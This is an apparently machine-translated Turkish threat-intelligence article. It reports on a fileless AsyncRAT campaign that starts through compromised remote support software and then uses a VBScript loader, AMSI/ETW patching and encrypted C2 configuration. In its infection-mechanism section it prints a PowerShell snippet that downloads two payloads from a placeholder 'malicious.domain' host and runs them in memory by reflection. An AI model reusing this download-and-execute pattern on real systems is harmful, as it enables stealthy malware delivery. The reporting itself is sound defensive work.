Güvenlik araştırmacıları son zamanlarda kurumsal ortamları hedefleyen sofistike söz konusu kötü amaçlı yazılım kampanyalarında bir artış gözlemlediler.
Güçlü bir uzaktan erişim Truva atı olan Asyncrat, tamamen bellekte kötü niyetli yükler yürütmek için meşru sistem araçlarından yararlanır ve geleneksel disk tabanlı savunmaları etkili bir şekilde ortadan kaldırır.
Bu tehdidin ortaya çıkışı, siber rakipler tarafından, güvenliği ihlal edilmiş sistemlerde gizli ve kalıcılığı korumak için kullanılan gelişen taktiklerin altını çizmektedir.
Bu saldırıların çoğunluğundaki ilk erişim, tehlikeye atılmış uzaktan destek yazılımı ile elde edilir. Davetsiz misafirler yetkisiz ekran bağlantılarından yararlanır ve kurban makineleri üzerinde etkileşimli kontrol elde ederler.
İçeri girdikten sonra, VBScript’te yazılmış çok aşamalı bir yükleyici kullanırlar. Level Blue analistleri, bu yükleyicinin kodlanmış iki yükü aldığını belirtti –logs.ldk Ve logs.ldr-Saldırgan kontrollü sunuculardan.
Bu yükler asla diske yazılmaz; Bunun yerine, doğrudan belleğe yansıtılırlar, çiğ bayt dizilerini çalışma zamanında yürütülebilir koda dönüştürürler.
Asyncrat’ın mimarisi, hem kaçırma hem de çekirdek sıçan işlevselliği için tasarlanmış modüler .NET düzenekleri etrafında döner.
Level Blue araştırmacıları, birinci aşama DLL’de üç ana sınıf belirlediler: bir giriş noktası başlatıcı, meşru güncelleyiciler olarak gizlenmiş planlanmış görevleri oluşturan bir kalıcılık yöneticisi ve Windows güvenlik günlüğünü devre dışı bırakmak için AMSI ve ETW kancalarını yamalayan bir anti-analiz bileşeni.
Dinamik API çözünürlüğü ve bellek içi yükleme yoluyla, kötü amaçlı yazılım gizliliği en üst düzeye çıkarır ve adli analizi karmaşıklaştırır.
Gizlemenin ötesinde, Asyncrat’ın ikinci aşaması –AsyncClient.exe-Komut ve kontrol motoru olarak hizmet verir.
İkili içindeki şifrelenmiş yapılandırma verileri, C2 etki alanlarını, bağlantı noktalarını, enfeksiyon bayraklarını ve hedef dizinleri belirtir.
AES-256 ile şifre çözme üzerine, istemci kontrol sunucusuna bir TCP soketi oluşturur ve uzunlukla ayarlanmış mesaj paketi paketleri değiştirir.
Bu protokol keşif komutlarını, veri ekleme rutinlerini ve saldırgan tarafından sağlanan talimatların uzaktan yürütülmesini destekler.
Enfeksiyon mekanizması
Asyncrat’ın enfeksiyon mekanizması, basit bir VBScript’in yürütülmesi ile başlar, Update.vbsbaşlatıldı WScript.exe.
Komut dosyası, yükleyiciyi almak ve yürütmek için aşağıdaki PowerShell snippet’ini kullanır:
$urls = @("http://malicious.domain/logs.ldk","http://malicious.domain/logs.ldr")
foreach ($u in $urls) {
$bytes = (New-Object Net.WebClient).DownloadData($u)
[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())
}Bu özlü yükleyici iki kritik işlevi yerine getirir: İndirilen ikili dosyaları şifresini çözer ve giriş noktalarını tamamen bellekte çağırır ve diskte adli ayak izi bırakmaz.
Obfuscator.dll’deki anti-analiz rutinleri ile yansıma tabanlı yüklemeyi zincirleyerek saldırgan, her aşamanın uç nokta algılama araçlarından gizli kalmasını sağlar.
Müteakip kontrol, kalıcılığı koruyan ve ana bilgisayarın tam uzaktan uygulamasını sağlayan asyncclient.exe’ye dağıtılır.
Asyncrat, bu filessiz yaklaşım sayesinde, modern kötü amaçlı yazılımların, hedeflenen sistemleri sorunsuz bir şekilde tehlikeye atmak ve kontrol etmek için meşru komut dosyası platformlarını ileri kaçış taktikleriyle nasıl harmanlayabileceğini göstermektedir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.